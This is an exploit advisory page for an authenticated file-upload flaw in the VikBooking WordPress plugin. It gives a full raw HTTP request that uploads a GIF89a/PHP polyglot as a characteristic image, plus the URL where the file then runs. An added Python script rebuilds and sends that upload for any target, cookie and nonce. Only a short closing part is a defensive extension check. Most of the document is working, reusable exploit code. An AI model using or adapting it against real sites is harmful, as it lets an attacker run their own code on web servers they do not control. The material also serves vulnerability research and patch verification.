## https://sploitus.com/exploit?id=WPEX-ID:1330F8F7-4A59-4E9D-ACAE-21656A4101FE
Edit or add a Characteristic (/wp-admin/admin.php?option=com_vikbooking&task=carat) as an Administrator-level user and upload a fake GIF containing PHP code as the Characteristic Image. The file keeps its `.php` name; the leading `GIF89a` signature only makes the content look like an image. In the request below, `Cookie: [admin+]` stands for the session cookie of an Administrator (or higher) account, and `vikwp_nonce` must be the current nonce taken from that session's Characteristics page:

```http
POST /wp-admin/admin.php HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"

WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif

GIF89a;
<?php phpinfo() ?>

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"

250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"

<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"

updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"

com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"

2817d7732a
-----------------------------119541905442224294322517652959--
```

The plugin stores the file under its upload directory with the original name, so the web server serves it as PHP at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php; requesting that URL executes `phpinfo()`.
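The following is an added example, not code from the advisory or from the VikBooking plugin. It rebuilds the multipart request above with the Python standard library (same field names and values, a GIF89a/PHP polyglot as the `caraticon` part) so the upload can be reproduced or varied without hand-editing boundaries and lengths, and then shows the defender's side: a magic-byte check alone accepts the polyglot, so the stored name must also be held to an extension allow-list. The base URL, the admin session cookie and the nonce are assumed to be supplied by the caller; the allow-list check is illustrative and is not the plugin's actual fix.

```python
import re
import secrets
import urllib.request

ENDPOINT = "/wp-admin/admin.php"

# Text fields of the captured request, in the same order; the nonce is added
# per session because it is only valid for the admin session that issued it.
BASE_FIELDS = [
    ("caratname", "WiFi"),
    ("resizeto", "250"),
    ("carattextimg", '<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>'),
    ("ordering", "1"),
    ("task", "updatecarat"),
    ("whereup", "1"),
    ("option", "com_vikbooking"),
]


def build_polyglot_gif(php: bytes = b"<?php phpinfo() ?>") -> bytes:
    """GIF89a signature followed by PHP. Any check that only inspects the
    leading bytes sees an image; the PHP interpreter treats the signature as
    inline text and runs the code that follows."""
    return b"GIF89a;\n" + php + b"\n"


def build_multipart(fields, files, boundary=None):
    """Encode (name, value) text fields and (name, filename, content_type, data)
    file parts as multipart/form-data. Returns (body, Content-Type value)."""
    boundary = boundary or "---------------------------" + secrets.token_hex(14)
    sep = ("--" + boundary).encode()
    parts = []
    for name, value in fields:
        parts.append(sep + b"\r\n"
                     + f'Content-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
                     + value.encode() + b"\r\n")
    for name, filename, ctype, data in files:
        parts.append(sep + b"\r\n"
                     + f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'.encode()
                     + f"Content-Type: {ctype}\r\n\r\n".encode()
                     + data + b"\r\n")
    body = b"".join(parts) + sep + b"--\r\n"
    return body, "multipart/form-data; boundary=" + boundary


def build_upload_request(base_url, admin_cookie, nonce, filename="phpinfo.php"):
    """A urllib Request equivalent to the captured POST. base_url, the admin
    session cookie and the current vikwp_nonce are assumed to be known to the
    caller; nothing is sent here (urllib.request.urlopen(req) would send it)."""
    fields = BASE_FIELDS + [("vikwp_nonce", nonce)]
    files = [("caraticon", filename, "image/gif", build_polyglot_gif())]
    body, ctype = build_multipart(fields, files)
    headers = {
        "Content-Type": ctype,
        "Content-Length": str(len(body)),
        "Cookie": admin_cookie,
        "Connection": "close",
    }
    return urllib.request.Request(base_url.rstrip("/") + ENDPOINT,
                                  data=body, headers=headers, method="POST")


# Defender side (illustrative, not the plugin's fix): a magic-byte check on
# its own accepts the polyglot above, so the stored name must also be held to
# an extension allow-list that refuses anything the web server hands to PHP.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
PHP_EXT_RE = re.compile(r"\.(php\d*|phtml|phar)(\.|$)", re.IGNORECASE)


def looks_like_gif(data: bytes) -> bool:
    """What a signature-only check sees: the polyglot passes."""
    return data.startswith(MAGIC["gif"])


def upload_is_safe(filename: str, data: bytes) -> bool:
    """True only if the extension is allow-listed, no PHP-style extension
    appears anywhere in the name (shell.php.gif) and the bytes match the
    claimed type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC or PHP_EXT_RE.search(filename):
        return False
    return data.startswith(MAGIC[ext])
```

`build_upload_request("https://example.com/m", "<admin session cookie>", "<current nonce>")` yields the request; the placeholders are the caller's own values. The boundary is random per call, which is why `Content-Length` is computed from the encoded body rather than copied from the capture.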